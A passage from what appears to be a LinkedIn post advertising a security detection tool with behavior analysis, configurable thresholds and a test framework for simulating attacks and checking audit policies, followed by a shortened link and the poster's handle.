β’ User behavior analysis
β’ Configurable business hours
β’ Customizable thresholds
π§ͺ Includes Test Framework:
β’ Simulate various attack scenarios
β’ Validate detection capabilities
β’ Test environment readiness
β’ Verify audit policies
π Get started: https://lnkd.in/gbuaaswB
Michael H.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
lnkd.in
LinkedIn
This link will take you to a page thatβs not on LinkedIn